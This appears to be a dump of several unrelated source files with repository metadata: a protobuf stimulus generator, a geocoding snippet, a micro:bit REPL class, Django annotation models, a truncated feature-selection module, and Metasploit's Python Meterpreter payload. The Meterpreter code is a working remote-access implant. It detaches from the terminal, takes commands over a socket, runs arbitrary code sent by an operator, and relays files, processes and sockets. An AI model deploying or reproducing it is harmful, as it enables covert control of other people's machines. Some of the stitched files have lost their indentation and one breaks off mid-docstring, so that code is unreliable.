tools/stimgen/gen_recall.py
|
herenvarno/gsbn
|
47ed0932b605d8b3cf9661f9308908364ad5892e
|
[
"MIT"
] | 2
|
2017-04-23T17:22:23.000Z
|
2017-05-25T14:22:51.000Z
|
tools/stimgen/gen_recall.py
|
herenvarno/gsbn
|
47ed0932b605d8b3cf9661f9308908364ad5892e
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import os
import sys
import re
import math
import random
import matplotlib.pyplot as plt
import numpy as np
from google.protobuf import text_format
sys.path.append(os.path.dirname(os.path.realpath(__file__))+"/../../build")
import gsbn_pb2
if len(sys.argv) < 2:
print("Arguments wrong! Please retry with command :")
print("python "+os.path.realpath(__file__)+" <output file name>")
exit(-1)
filename = sys.argv[1]
patterns = []
masks = []
DIM_HCU = 10
DIM_MCU = 10
rd = gsbn_pb2.StimRawData()
p = [0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,3,4,5,6,7,8,9]
patterns.append(p)
p = [0,1,2,3,4,5,6,7,8,0xfffffff]
patterns.append(p)
p = [0,1,2,3,4,5,6,7,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,3,4,5,6,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,3,4,5,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,3,4,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,3,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
m = [0,0,0,0,0,0,0,0,0,0]
masks.append(m)
m = [1,1,1,1,1,1,1,1,1,1]
masks.append(m)
for p in patterns:
for v in p:
rd.data.append(v)
for p in masks:
for v in p:
rd.mask.append(v)
rd.data_rows = len(patterns)
rd.data_cols = DIM_HCU
rd.mask_rows = len(masks)
rd.mask_cols = DIM_HCU
with open(filename, "wb+") as f:
f.write(rd.SerializeToString())
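A hedged sketch of reading the generated stimulus file back with the same protobuf message type (field names taken from the code above; ParseFromString is the standard protobuf API):
rd_check = gsbn_pb2.StimRawData()
with open(filename, "rb") as f:
    rd_check.ParseFromString(f.read())
print(rd_check.data_rows, rd_check.data_cols)   # expected: 11 10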
| 25.643836
| 115
| 0.744658
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 116
| 0.061966
|
b81231fb69c94c906db0d3069a6a4df0633be007
| 174
|
py
|
Python
|
python/find_country/city.py
|
lukasjoc/scritps
|
ebcffef0a3977ab8bb1bebf20383c350bd7baa37
|
[
"0BSD"
] | 1
|
2020-11-09T19:32:43.000Z
|
2020-11-09T19:32:43.000Z
|
python/find_country/city.py
|
lukasjoc/scritps
|
ebcffef0a3977ab8bb1bebf20383c350bd7baa37
|
[
"0BSD"
] | null | null | null |
python/find_country/city.py
|
lukasjoc/scritps
|
ebcffef0a3977ab8bb1bebf20383c350bd7baa37
|
[
"0BSD"
] | null | null | null |
#!/usr/bin/env python3
from geopy.geocoders import Nominatim
locator = Nominatim(user_agent="getcity")
loc = locator.geocode("Munich")
print(loc.latitude, loc.longitude)
| 17.4
| 41
| 0.764368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 39
| 0.224138
|
b8126bfcea007e0faa9e48fd38823790a37c5d11
| 6,448
|
py
|
Python
|
bitio/src/microbit/repl/repl.py
|
hungjuchen/Atmosmakers
|
4e8e64fba3d7a31840f69a5aa3823247aa5dca02
|
[
"MIT"
] | 85
|
2017-06-09T20:53:46.000Z
|
2022-03-09T21:35:05.000Z
|
bitio/src/microbit/repl/repl.py
|
hungjuchen/Atmosmakers
|
4e8e64fba3d7a31840f69a5aa3823247aa5dca02
|
[
"MIT"
] | 34
|
2017-06-09T20:52:05.000Z
|
2021-02-19T19:49:45.000Z
|
bitio/src/microbit/repl/repl.py
|
hungjuchen/Atmosmakers
|
4e8e64fba3d7a31840f69a5aa3823247aa5dca02
|
[
"MIT"
] | 32
|
2017-06-09T10:15:19.000Z
|
2021-11-20T09:08:08.000Z
|
# repl/repl.py
#
# A REPL interface to a micro:bit or similar device running MicroPython
# This is written on top of pyserial, however the dependency on pyserial
# is soft (as the serial instance is passed in as a constructor parameter
# and the detection of the need to bytes-encode strings is dynamic).
# Thus you can pass in any object that implements the following interface:
# write(str)
# read()-> str
# and/or this interface:
# write(bytes)
# read()->bytes
import time
import re
class REPLException(Exception):
def __init__(self, msg=None):
Exception.__init__(self, msg)
class REPL():
def __init__(self, ser):
self.ser = ser
def rx(): # always return a str(1) regardless of python version
data = ser.read(1)
if len(data) == 0:
return None
if type(data) == str: # pyserial2
d = data[0]
elif type(data) == bytes: # pyserial3
d = data[0] # this will be a bytes() of len 1
d = chr(d)
else: # no idea!
raise REPLException("Unknown return type from ser.read:%s" % str(type(data)))
return d
self.readch = rx
def receive(self, wanted=None, min_length=None, max_length=None, timeout=None, idle_timeout=None):
##print("trying to receive:%s" % str(wanted))
if wanted is not None:
matcher = re.compile(wanted, re.DOTALL)
else:
matcher = None
now = time.time()
if timeout is not None:
timeout_at = now + timeout
else:
timeout_at = None
if idle_timeout is not None:
idle_timeout_at = now + idle_timeout
else:
idle_timeout_at = None
buffer = ""
while True:
now = time.time()
ch = self.readch()
if ch is not None:
buffer += ch
if idle_timeout is not None:
idle_timeout_at = now + idle_timeout
if matcher is not None and idle_timeout is None and matcher.match(buffer):
if min_length is None:
##print("got:%s" % buffer)
return buffer #TODO get captures
elif len(buffer) >= min_length:
##print("got:%s" % buffer)
return buffer
if max_length is not None and len(buffer) >= max_length:
raise REPLException("buffer overflow? [%s]" % buffer)
if timeout_at is not None and now >= timeout_at:
raise REPLException("Timeout trying to receive [%s]" % buffer)
if idle_timeout_at is not None and now >= idle_timeout_at:
if matcher is not None and matcher.match(buffer):
if min_length is None:
##print("got:%s" % buffer)
return buffer
elif len(buffer) >= min_length:
return buffer
##print("got:%s" % buffer)
else:
raise REPLException("Did not match at end of idle timeout, too short [%s]" % buffer)
else:
raise REPLException("Did not match at end of idle timeout [%s]" % buffer)
def to_raw(self):
##print("**** WAITING FOR PROMPT")
if not self.wait_prompt():
##print("**** SENDING CTRL-C to force a prompt")
self.ctrl_c() # try to stop running user program
self.ctrl_b() # also if already at raw REPL, trigger exit from it
##print("**** waiting for prompt response")
if not self.wait_prompt():
raise REPLException("could not get a prompt")
##print("**** SENDING CTRL-A to get raw repl")
self.ctrl_a() # enter raw REPL mode
self.wait_repl_response()
##print("**** GOT RAW REPL")
def wait_prompt(self):
try:
##print("*** waiting for prompt")
self.receive(".*>>> ", timeout=2, idle_timeout=1)
except REPLException as e:
##print("*** REPLEXCEPTION:%s" % str(e))
return False
return True
    ##TODO: This does not work at all in Python 3; it seems to encode as b'\x00 \x00 \x00',
    #and as a result the REPL does not respond at all. However, it still works in Python 2
    #at the moment.
# if we pass in chr(ord(code)-64) we get a 'can't handle unicode \x03' error in ser.write.
# Note: Martin O'Hanlon said in BlueDot he wrote a to_bytes.
# There is a to_bytes inside PySerial, but for some reason the REPL prompt is not
# detected - perhaps that is less to do with byte encoding, and more to do with
# string comparisons failing? Put some debug on this and see what actually is sent and returned.
def ctrl_c(self):
self.ser.write(b'\x03')
def ctrl_a(self):
self.ser.write(b'\x01')
def ctrl_b(self):
self.ser.write(b'\x02')
def ctrl_d(self):
self.ser.write(b'\x04')
def wait_repl_response(self):
self.receive("\r\nraw REPL; CTRL-B to exit\r\n>", timeout=2)
def _send_command(self, cmd):
self.ser.write(cmd)
def send_command(self, cmd):
#pyserial 3 or greater will not cope with strings, must be bytes
        #but we don't want a hard dependency on the 'serial' module, and this is
#not really a python3 thing, it's a pyserial thing.
#We resolve this by catching the first TypeError and rewriting the wrapper
#function for future calls.
try:
self._send_command(cmd)
except TypeError:
def _new_send_command(cmd):
cmd = bytes(cmd, 'UTF-8')
self.ser.write(cmd)
self._send_command = _new_send_command
self._send_command(cmd)
self.ctrl_d()
def wait_response(self):
self.receive("OK", timeout=1, min_length=2)
output_text = self.receive(".*\x04")
exception_text = self.receive(".*\x04", timeout=1)
output_text = output_text[:-1] # strip CTRL-D
exception_text = exception_text[:-1] # strip CTRL-D
self.receive(">", timeout=1)
if exception_text != "":
raise REPLException("REPL exception:%s" % exception_text)
return output_text
# END
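# --- Illustrative usage sketch (editor addition, not part of the original module).
# The serial port path and baud rate below are hypothetical; any object exposing
# write()/read() as described in the header comment can be used instead of pyserial.
if __name__ == "__main__":
    import serial  # soft dependency, only needed for this demo
    port = serial.Serial("/dev/ttyACM0", 115200, timeout=0.1)
    repl = REPL(port)
    repl.to_raw()                        # force the board into the raw REPL
    repl.send_command("print(2 + 2)")    # run a small statement remotely
    print(repl.wait_response())          # expected to print '4'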
| 35.234973
| 108
| 0.563896
| 5,942
| 0.921526
| 0
| 0
| 0
| 0
| 0
| 0
| 2,366
| 0.366935
|
b812c3ba84401bea4ea454da2ee284c224fe8b47
| 44
|
py
|
Python
|
lib/connection/RequestException.py
|
Karaya-12/Website-Dir-Scanner
|
04b150524631e2fff00a319b7daab7f4d32ddb18
|
[
"MIT"
] | 3
|
2019-09-30T07:12:58.000Z
|
2020-08-15T10:50:51.000Z
|
emailrep/exceptions.py
|
pry0cc/emailrep.io-python
|
c33839d327d438e75b4e6eea462ab15677462d54
|
[
"MIT"
] | null | null | null |
emailrep/exceptions.py
|
pry0cc/emailrep.io-python
|
c33839d327d438e75b4e6eea462ab15677462d54
|
[
"MIT"
] | 1
|
2019-08-22T15:35:11.000Z
|
2019-08-22T15:35:11.000Z
|
class RequestException(Exception):
pass
| 14.666667
| 34
| 0.772727
| 43
| 0.977273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
b814083d787036eed69c0998c2575b86f722e9ca
| 3,172
|
py
|
Python
|
src/cocoannot/annotpreferred/models.py
|
coco-tasks/annotation-tool
|
ebd2e77ec8aeddedb9f87f457b6d5d8989b602db
|
[
"MIT"
] | 9
|
2019-04-18T15:35:38.000Z
|
2021-06-07T08:01:27.000Z
|
src/cocoannot/annotpreferred/models.py
|
coco-tasks/annotation-tool
|
ebd2e77ec8aeddedb9f87f457b6d5d8989b602db
|
[
"MIT"
] | 1
|
2019-07-16T10:07:09.000Z
|
2019-07-16T10:07:09.000Z
|
src/cocoannot/annotpreferred/models.py
|
coco-tasks/annotation-tool
|
ebd2e77ec8aeddedb9f87f457b6d5d8989b602db
|
[
"MIT"
] | 3
|
2020-05-20T12:06:59.000Z
|
2020-12-12T06:45:26.000Z
|
from django.contrib.auth.models import User
from django.db import models
from markdownx.models import MarkdownxField
class Category(models.Model):
"""
Represents a COCO category
"""
coco_id = models.IntegerField(unique=True, db_index=True)
name = models.CharField(max_length=50)
supercategory = models.CharField(max_length=50)
def __str__(self):
return "Category {}: {} ({})".format(self.coco_id, self.name, self.supercategory)
class Task(models.Model):
"""
Represents a Task
"""
number = models.IntegerField(unique=True, db_index=True)
name = models.CharField(max_length=50)
desc = models.TextField(blank=True, null=True)
desc_image = models.ImageField(upload_to='task_images', blank=True, default=None, null=True)
def __str__(self):
return "Task {}: {}".format(self.number, self.name)
class Image(models.Model):
"""
Represents an image in the dataset
"""
coco_id = models.IntegerField(unique=True, db_index=True)
path = models.CharField(max_length=200)
set_name = models.CharField(max_length=10)
width = models.IntegerField()
height = models.IntegerField()
related_tasks = models.ManyToManyField(Task)
def __str__(self):
return "Image {}".format(self.coco_id)
class Annot(models.Model):
"""
Represents a COCO annotation for instances.
"""
coco_id = models.IntegerField(unique=True, db_index=True)
image = models.ForeignKey(Image, on_delete=models.CASCADE)
category = models.ForeignKey(Category, on_delete=models.CASCADE)
area = models.FloatField()
iscrowd = models.BooleanField()
bbox_x = models.FloatField()
bbox_y = models.FloatField()
bbox_w = models.FloatField()
bbox_h = models.FloatField()
segmentation = models.TextField() # I am going to store the segmentation as a text field.
# I will convert it into json on demand.
def __str__(self):
return "Annot {} ({})".format(self.coco_id, self.category)
def get_bbox(self):
return [self.bbox_x, self.bbox_y, self.bbox_w, self.bbox_h]
def set_bbox(self, bbox):
bbox = tuple(bbox)
self.bbox_x, self.bbox_y, self.bbox_w, self.bbox_h = bbox
class Job(models.Model):
"""
Represents a job (an annotation of the preferred objects) for an image by a user.
"""
task = models.ForeignKey(Task, on_delete=models.CASCADE, db_index=True)
image = models.ForeignKey(Image, on_delete=models.CASCADE, db_index=True)
user = models.ForeignKey(User, on_delete=models.CASCADE, db_index=True)
is_example = models.BooleanField(default=False, db_index=True)
is_done = models.BooleanField(default=False, db_index=True)
date_created = models.DateTimeField(auto_now_add=True)
def __str__(self):
return "Job[task={}, image={}, user={}]".format(self.task.name, self.image_id, self.user.first_name)
class PreferredAnnot(models.Model):
job = models.ForeignKey(Job, on_delete=models.CASCADE, db_index=True)
annot = models.ForeignKey(Annot, on_delete=models.CASCADE, db_index=True)
class AnnotationPolicy(models.Model):
policy = MarkdownxField()
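# --- Illustrative helpers (editor addition, hypothetical): the comment on
# Annot.segmentation says the segmentation is stored as text and converted to
# JSON on demand; these standalone functions sketch that round-trip.
import json

def decode_segmentation(annot):
    """Decode the stored segmentation text back into a Python structure."""
    return json.loads(annot.segmentation)

def encode_segmentation(annot, segmentation):
    """Encode a segmentation (e.g. a list of polygons) as text for storage."""
    annot.segmentation = json.dumps(segmentation)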
| 33.041667
| 108
| 0.698298
| 3,034
| 0.956494
| 0
| 0
| 0
| 0
| 0
| 0
| 482
| 0.151955
|
b81415a0a71fcac22aeb01aa39ba0c4dc0f68e8c
| 13,866
|
py
|
Python
|
data/meterpreter/meterpreter.py
|
codex8/metasploit-framework
|
eb745af12fe591e94f8d6ce9dac0396d834991ab
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 1
|
2015-11-05T21:38:38.000Z
|
2015-11-05T21:38:38.000Z
|
data/meterpreter/meterpreter.py
|
codex8/metasploit-framework
|
eb745af12fe591e94f8d6ce9dac0396d834991ab
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
data/meterpreter/meterpreter.py
|
codex8/metasploit-framework
|
eb745af12fe591e94f8d6ce9dac0396d834991ab
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python
import code
import ctypes
import os
import random
import select
import socket
import struct
import subprocess
import sys
import threading
has_windll = hasattr(ctypes, 'windll')
#
# Constants
#
PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1
PACKET_TYPE_PLAIN_REQUEST = 10
PACKET_TYPE_PLAIN_RESPONSE = 11
ERROR_SUCCESS = 0
# not defined in original C implementation
ERROR_FAILURE = 1
CHANNEL_CLASS_BUFFERED = 0
CHANNEL_CLASS_STREAM = 1
CHANNEL_CLASS_DATAGRAM = 2
CHANNEL_CLASS_POOL = 3
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = ( 0 )
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
#
# TLV base starting points
#
TLV_RESERVED = 0
TLV_EXTENSIONS = 20000
TLV_USER = 40000
TLV_TEMP = 60000
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72
TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300
TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301
TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
TLV_TYPE_MIGRATE_PID = TLV_META_TYPE_UINT | 402
TLV_TYPE_MIGRATE_LEN = TLV_META_TYPE_UINT | 403
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
def generate_request_id():
chars = 'abcdefghijklmnopqrstuvwxyz'
return ''.join(random.choice(chars) for x in xrange(32))
def packet_get_tlv(pkt, tlv_type):
offset = 0
while (offset < len(pkt)):
tlv = struct.unpack('>II', pkt[offset:offset+8])
if (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type:
val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = val.split('\x00', 1)[0]
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
pass
return {'type':tlv[1], 'length':tlv[0], 'value':val}
offset += tlv[0]
return {}
def tlv_pack(*args):
if len(args) == 2:
tlv = {'type':args[0], 'value':args[1]}
else:
tlv = args[0]
data = ""
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
data = struct.pack('>II', 8 + len(tlv['value']) + 1, tlv['type']) + tlv['value'] + '\x00'
elif (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
data = struct.pack('>III', 12, tlv['type'], tlv['value'])
elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
data = struct.pack('>II', 9, tlv['type']) + chr(int(bool(tlv['value'])))
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
return data
class STDProcessBuffer(threading.Thread):
def __init__(self, std, is_alive):
threading.Thread.__init__(self)
self.std = std
self.is_alive = is_alive
self.data = ''
self.data_lock = threading.RLock()
def run(self):
while self.is_alive():
byte = self.std.read(1)
self.data_lock.acquire()
self.data += byte
self.data_lock.release()
self.data_lock.acquire()
self.data += self.std.read()
self.data_lock.release()
def is_read_ready(self):
return len(self.data) != 0
def read(self, l = None):
data = ''
self.data_lock.acquire()
if l == None:
data = self.data
self.data = ''
else:
data = self.data[0:l]
self.data = self.data[l:]
self.data_lock.release()
return data
class STDProcess(subprocess.Popen):
def __init__(self, *args, **kwargs):
subprocess.Popen.__init__(self, *args, **kwargs)
def start(self):
self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
self.stdout_reader.start()
self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
self.stderr_reader.start()
class PythonMeterpreter(object):
def __init__(self, socket):
self.socket = socket
self.extension_functions = {}
self.channels = {}
self.interact_channels = []
self.processes = {}
for func in filter(lambda x: x.startswith('_core'), dir(self)):
self.extension_functions[func[1:]] = getattr(self, func)
self.running = True
def register_function(self, func):
self.extension_functions[func.__name__] = func
def register_function_windll(self, func):
if has_windll:
self.register_function(func)
def add_channel(self, channel):
idx = 0
while idx in self.channels:
idx += 1
self.channels[idx] = channel
return idx
def add_process(self, process):
idx = 0
while idx in self.processes:
idx += 1
self.processes[idx] = process
return idx
def run(self):
while self.running:
if len(select.select([self.socket], [], [], 0)[0]):
request = self.socket.recv(8)
if len(request) != 8:
break
req_length, req_type = struct.unpack('>II', request)
req_length -= 8
request = ''
while len(request) < req_length:
request += self.socket.recv(4096)
response = self.create_response(request)
self.socket.send(response)
else:
channels_for_removal = []
channel_ids = self.channels.keys() # iterate over the keys because self.channels could be modified if one is closed
for channel_id in channel_ids:
channel = self.channels[channel_id]
data = ''
if isinstance(channel, STDProcess):
if not channel_id in self.interact_channels:
continue
if channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read()
elif channel.stderr_reader.is_read_ready():
data = channel.stderr_reader.read()
elif channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
elif isinstance(channel, socket._socketobject):
while len(select.select([channel.fileno()], [], [], 0)[0]):
try:
d = channel.recv(1)
except socket.error:
d = ''
if len(d) == 0:
self.handle_dead_resource_channel(channel_id)
break
data += d
if data:
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
pkt += tlv_pack(TLV_TYPE_LENGTH, len(data))
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.socket.send(pkt)
def handle_dead_resource_channel(self, channel_id):
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_close')
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.socket.send(pkt)
def _core_loadlib(self, request, response):
data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE
preloadlib_methods = self.extension_functions.keys()
i = code.InteractiveInterpreter({'meterpreter':self, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
i.runcode(compile(data_tlv['value'], '', 'exec'))
postloadlib_methods = self.extension_functions.keys()
new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
for method in new_methods:
response += tlv_pack(TLV_TYPE_METHOD, method)
return ERROR_SUCCESS, response
def _core_shutdown(self, request, response):
response += tlv_pack(TLV_TYPE_BOOL, True)
self.running = False
return ERROR_SUCCESS, response
def _core_channel_open(self, request, response):
channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
handler = 'channel_create_' + channel_type['value']
if handler not in self.extension_functions:
return ERROR_FAILURE, response
handler = self.extension_functions[handler]
return handler(request, response)
def _core_channel_close(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
if isinstance(channel, file):
channel.close()
elif isinstance(channel, subprocess.Popen):
channel.kill()
        elif isinstance(channel, socket._socketobject):
channel.close()
else:
return ERROR_FAILURE, response
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
return ERROR_SUCCESS, response
def _core_channel_eof(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
result = False
if isinstance(channel, file):
result = channel.tell() == os.fstat(channel.fileno()).st_size
response += tlv_pack(TLV_TYPE_BOOL, result)
return ERROR_SUCCESS, response
def _core_channel_interact(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value']
if toggle:
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
else:
self.interact_channels.append(channel_id)
elif channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
return ERROR_SUCCESS, response
def _core_channel_read(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
data = ''
if isinstance(channel, file):
data = channel.read(length)
elif isinstance(channel, STDProcess):
if channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
if channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read(length)
        elif isinstance(channel, socket._socketobject):
data = channel.recv(length)
else:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
return ERROR_SUCCESS, response
def _core_channel_write(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
l = len(channel_data)
if isinstance(channel, file):
channel.write(channel_data)
elif isinstance(channel, subprocess.Popen):
if channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
channel.stdin.write(channel_data)
        elif isinstance(channel, socket._socketobject):
try:
l = channel.send(channel_data)
except socket.error:
channel.close()
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
else:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_LENGTH, l)
return ERROR_SUCCESS, response
def create_response(self, request):
resp = struct.pack('>I', PACKET_TYPE_RESPONSE)
method_tlv = packet_get_tlv(request, TLV_TYPE_METHOD)
resp += tlv_pack(method_tlv)
reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
resp += tlv_pack(reqid_tlv)
if method_tlv['value'] in self.extension_functions:
handler = self.extension_functions[method_tlv['value']]
try:
result, resp = handler(request, resp)
except Exception, err:
result = ERROR_FAILURE
else:
result = ERROR_FAILURE
resp += tlv_pack(TLV_TYPE_RESULT, result)
resp = struct.pack('>I', len(resp) + 4) + resp
return resp
if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
if hasattr(os, 'setsid'):
os.setsid()
met = PythonMeterpreter(s)
met.run()
| 33.737226
| 134
| 0.706044
| 9,262
| 0.667965
| 0
| 0
| 0
| 0
| 0
| 0
| 799
| 0.057623
|
b814b973d8e54a857c2c3fc248c1064d45ba00c1
| 8,599
|
py
|
Python
|
utils/dev/feature.py
|
brunocvs7/bot_detection_twitter_profile_features
|
44a88b0774bdab33da78f7679e109ccd8c34f4df
|
[
"MIT"
] | 1
|
2021-11-03T02:22:57.000Z
|
2021-11-03T02:22:57.000Z
|
utils/dev/feature.py
|
brunocvs7/bot_detection_twitter_profile_features
|
44a88b0774bdab33da78f7679e109ccd8c34f4df
|
[
"MIT"
] | null | null | null |
utils/dev/feature.py
|
brunocvs7/bot_detection_twitter_profile_features
|
44a88b0774bdab33da78f7679e109ccd8c34f4df
|
[
"MIT"
] | 1
|
2021-11-01T00:49:07.000Z
|
2021-11-01T00:49:07.000Z
|
from sklearn.preprocessing import MinMaxScaler
from sklearn.pipeline import Pipeline
from scipy.stats import chi2_contingency
from sklearn.compose import ColumnTransformer
from boruta import BorutaPy
from sklearn.ensemble import RandomForestClassifier
from sklearn.preprocessing import OrdinalEncoder
from sklearn.impute import SimpleImputer
from scipy.stats import pointbiserialr
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import StratifiedKFold, cross_val_score
import pandas as pd
import numpy as np
def point_biserial(df, y, num_columns = None, significance=0.05):
'''
    Perform feature selection based on a point-biserial correlation test.
    Parameters:
        df (pandas.dataframe): A dataframe containing all features and the target
        num_columns (list): A list containing all numerical features. If None or empty, the function tries to infer the numerical columns itself
        y (string): A string indicating the target column.
    Returns:
        pb_df (pandas.dataframe): A dataframe with the correlation and p-value per column
        columns_remove_pb (list): A list of columns that should be removed (no significant correlation)
